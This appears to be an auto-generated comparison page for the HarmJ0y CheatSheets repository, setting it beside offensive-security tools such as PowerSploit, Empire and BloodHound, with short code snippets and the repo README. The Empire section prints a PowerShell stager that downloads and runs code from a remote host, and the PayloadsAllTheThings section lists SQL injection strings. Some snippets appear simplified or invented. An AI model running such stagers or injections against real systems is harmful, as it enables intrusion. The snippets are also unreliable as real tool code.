Convert Figma logo to code with AI

HarmJ0y logoCheatSheets

Cheat sheets for various projects.

1,026
205
1,026
2

Top Related Projects

PowerSploit - A PowerShell Post-Exploitation Framework

Six Degrees of Domain Admin

8,654

Nishang - Offensive PowerShell for red team, penetration testing and offensive security.

7,394

Empire is a PowerShell and Python post-exploitation agent.

13,264

Impacket is a collection of Python classes for working with network protocols.

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

Quick Overview

HarmJ0y/CheatSheets is a GitHub repository containing a collection of cheat sheets for various cybersecurity tools and techniques. It serves as a quick reference guide for penetration testers, security researchers, and ethical hackers. The repository covers a wide range of topics, including PowerShell, Active Directory, and Windows privilege escalation.

Pros

  • Comprehensive coverage of various cybersecurity topics
  • Regularly updated with new information and techniques
  • Easy to read and understand format
  • Created and maintained by a respected security researcher (Will Schroeder, aka @harmj0y)

Cons

  • Some cheat sheets may become outdated as tools and techniques evolve
  • Not a substitute for in-depth learning and hands-on experience
  • May require additional context or knowledge for some advanced topics
  • Limited to specific areas of cybersecurity, not covering all possible domains

Competitor Comparisons

PowerSploit - A PowerShell Post-Exploitation Framework

Pros of PowerSploit

  • Comprehensive collection of PowerShell modules for penetration testing and post-exploitation
  • Actively maintained with regular updates and contributions from the community
  • Includes advanced features like Mimikatz integration and reflective DLL injection

Cons of PowerSploit

  • Larger codebase, which may be overwhelming for beginners
  • Some antivirus software may flag PowerSploit scripts as malicious
  • Requires more setup and configuration compared to simple cheat sheets

Code Comparison

PowerSploit example (Get-GPPPassword function):

function Get-GPPPassword {
    [CmdletBinding()]
    Param (
        [Parameter(Mandatory=$false,
        HelpMessage="Credentials to use when connecting to a Domain Controller.")]
        [System.Management.Automation.PSCredential]
        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty
    )

CheatSheets example (PowerView cheat sheet):

# Get all the groups a user is effectively a member of
Get-DomainGroup -MemberIdentity <User/Group>

# Get all the members of a group
Get-DomainGroupMember -Identity <Group>

PowerSploit offers more complex and feature-rich scripts, while CheatSheets provides concise, easy-to-reference commands for quick use during penetration testing or security assessments.

Six Degrees of Domain Admin

Pros of BloodHound

  • Provides a visual representation of Active Directory attack paths
  • Offers a more comprehensive and automated approach to AD security analysis
  • Continuously updated with new attack techniques and features

Cons of BloodHound

  • Requires more setup and infrastructure compared to simple cheat sheets
  • May be overkill for basic penetration testing or small-scale assessments
  • Has a steeper learning curve for newcomers to AD security

Code Comparison

BloodHound (Cypher query example):

MATCH (u:User {name: 'JOHN@DOMAIN.COM'})
MATCH (g:Group) WHERE g.name CONTAINS 'ADMIN'
MATCH p = shortestPath((u)-[*1..]->(g))
RETURN p

CheatSheets (PowerView command example):

Get-NetUser | Select-Object samaccountname, description, pwdlastset
Get-NetGroup *admin* | Get-NetGroupMember

While CheatSheets provides quick reference commands for various tasks, BloodHound offers a more sophisticated approach to visualizing and analyzing Active Directory environments. CheatSheets is more suitable for quick lookups and basic assessments, whereas BloodHound excels in complex AD security analysis and attack path identification.

8,654

Nishang - Offensive PowerShell for red team, penetration testing and offensive security.

Pros of Nishang

  • Comprehensive collection of PowerShell scripts for offensive security
  • Regularly updated with new tools and techniques
  • Includes scripts for various stages of penetration testing

Cons of Nishang

  • Primarily focused on PowerShell, limiting its use in non-Windows environments
  • May require more setup and configuration compared to CheatSheets
  • Some scripts may be detected by antivirus software

Code Comparison

Nishang (PowerShell script example):

function Get-Information
{
    [CmdletBinding()] Param()
    $output = Get-ComputerInfo
    return $output
}

CheatSheets (Command-line example):

# Get system information
systeminfo

# List running processes
tasklist

While Nishang provides full PowerShell scripts for various tasks, CheatSheets offers concise command-line examples and explanations for quick reference. Nishang is more suited for in-depth PowerShell-based operations, while CheatSheets serves as a quick reference guide for various tools and techniques across different platforms.

7,394

Empire is a PowerShell and Python post-exploitation agent.

Pros of Empire

  • Comprehensive post-exploitation framework with extensive functionality
  • Active development and community support
  • Modular architecture allowing easy extension and customization

Cons of Empire

  • Larger learning curve due to complexity
  • Requires more setup and configuration
  • May be overkill for simple penetration testing tasks

Code Comparison

Empire (PowerShell stager):

$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;
IEX $wc.DownloadString('http://empire.server:8080/launcher');

CheatSheets (PowerView example):

Get-NetDomain
Get-NetUser
Get-NetComputer
Get-NetGroup
Get-NetGroupMember

Summary

Empire is a powerful post-exploitation framework with extensive capabilities, while CheatSheets provides concise reference material for various penetration testing tools and techniques. Empire offers more comprehensive functionality but requires more setup and expertise. CheatSheets is simpler to use and provides quick reference, but lacks the advanced features of Empire. The choice between them depends on the specific needs of the penetration testing engagement and the user's experience level.

13,264

Impacket is a collection of Python classes for working with network protocols.

Pros of Impacket

  • Comprehensive collection of Python classes for working with network protocols
  • Actively maintained with regular updates and contributions
  • Provides both high-level and low-level access to various network protocols

Cons of Impacket

  • Steeper learning curve due to its extensive functionality
  • Requires more setup and dependencies compared to simple cheat sheets
  • May be overkill for basic penetration testing tasks

Code Comparison

CheatSheets example (PowerView):

Get-NetDomain
Get-NetUser
Invoke-ShareFinder

Impacket example (SMB):

from impacket.smbconnection import SMBConnection
conn = SMBConnection(target, target)
conn.login(username, password)

Summary

CheatSheets offers quick reference guides for various tools and techniques, while Impacket provides a robust framework for network protocol manipulation. CheatSheets is more accessible for beginners and quick lookups, whereas Impacket offers deeper functionality for advanced network operations and custom tool development.

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

Pros of PayloadsAllTheThings

  • More comprehensive coverage of various attack vectors and techniques
  • Regularly updated with new payloads and methodologies
  • Well-organized structure with clear categorization of topics

Cons of PayloadsAllTheThings

  • May be overwhelming for beginners due to the sheer volume of information
  • Less focused on specific tools or platforms compared to CheatSheets
  • Some sections may lack detailed explanations or context

Code Comparison

PayloadsAllTheThings (SQL Injection):

' OR '1'='1
' UNION SELECT NULL,NULL,NULL--
EXEC sp_executesql N'SELECT * FROM users WHERE username = '''+@user+''' AND password = '''+@pass+''''

CheatSheets (PowerView):

Get-NetDomain
Get-NetUser | select samaccountname, description, pwdlastset
Invoke-UserHunter -GroupName "Domain Admins"

While PayloadsAllTheThings provides a wide array of payload examples for various attack scenarios, CheatSheets focuses on specific tools and techniques, offering more targeted information for certain areas of penetration testing and red teaming.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

CheatSheets

Cheat sheets for various projects I contribute to (PowerView, PowerUp, Empire, and PowerSploit). Also a sheet for a commercial toolset we use frequently (Beacon/Cobalt Strike).

Note: PowerView and PowerUp have been integrated into the PowerSploit repository. Their 'bleeding edge' versions will always be in the development branch. Empire also has additional documentation at http://www.powershellempire.com/.

License

Creative Commons v3 "Attribution" License https://creativecommons.org/licenses/by/3.0/us/